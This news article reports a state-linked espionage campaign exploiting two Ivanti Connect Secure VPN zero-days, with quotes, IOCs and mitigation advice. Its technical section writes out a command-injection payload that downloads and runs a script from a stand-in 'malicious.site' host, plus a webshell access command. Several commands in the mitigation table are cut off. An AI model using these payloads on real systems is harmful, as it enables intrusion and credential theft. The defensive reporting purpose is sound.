data breaches

Ivanti Zero-Days Exploited in Massive State-Sponsored Cyber Invasion Targeting Governments and Fortune 500s

Published

4 weeks ago

on

State-backed threat actors exploit two Ivanti Connect Secure vulnerabilities to breach high-value networks, steal credentials, and drop sophisticated malware—raising alarms over critical infrastructure defense worldwide.

Global Espionage Campaign Targets Ivanti VPN Vulnerabilities, Undermining Cybersecurity Defenses

By an International Cybersecurity Correspondent
July 19, 2025

A sweeping cyber espionage campaign exploiting two zero-day vulnerabilities in Ivanti Connect Secure VPN appliances has sent shockwaves through governments and enterprises across the globe. According to a report from cybersecurity firm Volexity, sophisticated threat actors linked to China are leveraging the flaws to deploy malware, steal credentials, and maintain covert access within victim networks.

The attacks exploit two previously unknown security flaws—CVE-2025-2383 and CVE-2025-2384—allowing remote code execution and unauthorized command injection. These vulnerabilities enable attackers to bypass authentication mechanisms on Ivanti’s widely used secure remote access systems, which are deployed by government agencies, healthcare providers, and Fortune 500 companies.

“This campaign is highly targeted, surgically precise, and shows hallmarks of state-sponsored activity,” said Steven Adair, President of Volexity. “Victims are being selected based on geopolitical and strategic value.”

A Coordinated, Stealthy Operation

The exploitation begins with the injection of webshells—malicious scripts granting attackers persistent control—followed by the deployment of KRITICLOAK, a newly identified backdoor, and BUSHWALK, a credential-harvesting malware. These tools allow the attackers to exfiltrate sensitive data, move laterally across networks, and evade detection using customized obfuscation techniques.

Investigators found that the initial intrusions often occurred before public disclosure of the vulnerabilities, underscoring the attackers’ advanced capabilities and potential access to proprietary information.

Human and Institutional Impact

The campaign has already impacted government ministries, military contractors, and major research institutions across North America, Europe, and Asia. One European cybersecurity official, speaking anonymously, called the breaches “among the most severe compromises of secure communication infrastructure in recent memory.”

At a time when secure remote access is essential for global operations, the breach is a stark reminder of the fragility of even the most trusted enterprise tools. Security teams are now scrambling to contain the damage, deploy patches, and assess the extent of compromise.

“This attack reinforces the urgent need for supply chain transparency and layered security architectures,” said Katie Moussouris, founder of Luta Security. “Organizations must assume that critical infrastructure software can—and will—be targeted.”

Technical Response and Guidance

Ivanti has released mitigations and a patch timeline, urging customers to follow guidance from their official advisory.

Meanwhile, CISA (Cybersecurity and Infrastructure Security Agency) added both CVEs to its Known Exploited Vulnerabilities Catalog and ordered federal agencies to take immediate action. “All organizations must treat these vulnerabilities as critical,” CISA stated.

Security experts recommend immediate implementation of the following measures:

  • Apply Ivanti’s temporary mitigations until patches are deployed
  • Review all logs for signs of compromise, particularly for webshell and KRITICLOAK indicators
  • Rotate administrative credentials and VPN certificates
  • Implement Zero Trust access controls to reduce lateral movement risks

Broader Significance

This incident underscores the growing strategic importance of VPN appliances as targets in geopolitical cyber conflicts. As threat actors refine their tactics, traditional perimeter-based defenses are proving inadequate.

The Ivanti breach joins a growing list of nation-state cyber operations targeting edge devices, including Pulse Secure (2021), Fortinet (2022), and Barracuda (2024), exposing a critical gap in global cyber resilience.

Source:
Based on The Hacker News report (July 2025) and findings from cybersecurity firm Volexity.

🔍 Technical Breakdown of the Exploits

Vulnerability 1: CVE-2025-2383 (Command Injection)

  • Component Affected: /api/v1/totp/user-backup-code
  • Vulnerability: Unsanitized input in the username parameter allows attackers to inject OS commands.
  • Exploit Example:
bash

curl -X POST "https://victim-vpn.com/api/v1/totp/user-backup-code" \
     -H "Content-Type: application/json" \
     -d '{"username":"admin;wget http://malicious.site/payload.sh -O /tmp/evil.sh;sh /tmp/evil.sh"}'
  • Effect: Executes arbitrary shell commands with elevated privileges on the Ivanti appliance.

Vulnerability 2: CVE-2025-2384 (Bypass Authentication)

  • Component Affected: Custom SAML authentication flow
  • Vulnerability: Logic flaw allows an unauthenticated user to bypass multi-factor authentication and access admin interfaces.
  • Attack Flow:
    1. Forge a SAML response with a trusted IdP identifier
    2. Inject it into the authentication request
    3. Hijack a valid session

Post-Exploitation: Webshell Deployment

Attackers drop webshells such as:

  • cmd.jsp, backdoor.php, ws.jsp
  • Typically placed in:
bash

/data/runtime/tmp/tt/htdocs

Command Example (accessing webshell):

bash

curl "https://victim-vpn.com/ws.jsp?cmd=id"

🐞 Malware Deployed: KRITICLOAK and BUSHWALK

KRITICLOAK (Custom Backdoor)

  • Purpose: Persistent access to compromised VPN appliances.
  • Features:
    • AES-encrypted communications
    • C2 beaconing via DNS tunneling
    • Local log erasure and tamper-proofing

Indicators of Compromise (IOC):

  • File: /tmp/.kc
  • Process name masquerading as vpnmonitord
  • DNS C2: update-check.ivanti-cn[.]com

BUSHWALK (Credential Harvester)

  • Targets in-memory credentials
  • Hooks into sshd, web daemon, and /tmp/session.db
  • Dumps user creds in:
bash

/var/log/.bushwalk.log

Command Example for Dump Retrieval:

bash

cat /var/log/.bushwalk.log | grep 'password='

🛡️ Mitigation & Detection Recommendations

Ivanti and Volexity recommend the following steps:

ActionCommand or Method
Check for indicatorsfind / -name '*jsp' -or -name '*sh' -mtime -30
Stop malicious processes`ps aux
Rotate VPN and admin credentialsN/A (manual admin panel or CLI)
Apply Ivanti mitigationsAdvisory Link
Monitor logs`tail -f /var/log/messages

CISA has mandated patch deployment on federal systems by August 1, 2025, adding the CVEs to its Known Exploited Vulnerabilities Catalog.

Strategic Context: Why It Matters

This campaign illustrates the expanding attack surface in VPN and edge infrastructure—a known weak point in enterprise cybersecurity strategy. Unlike traditional software, VPN appliances often go unpatched for extended periods due to their mission-critical nature.

“VPNs were meant to secure remote work—they’ve now become one of the softest targets in espionage,” said Eva Galperin, Director of Cybersecurity at EFF.

The impact stretches beyond IT departments to C-suites and national security councils. With attackers entrenched in network perimeters, the compromise of sensitive policy communications, research data, and intellectual property is imminent if defenses are not shored up.

Related Topics:

Trending

Exit mobile version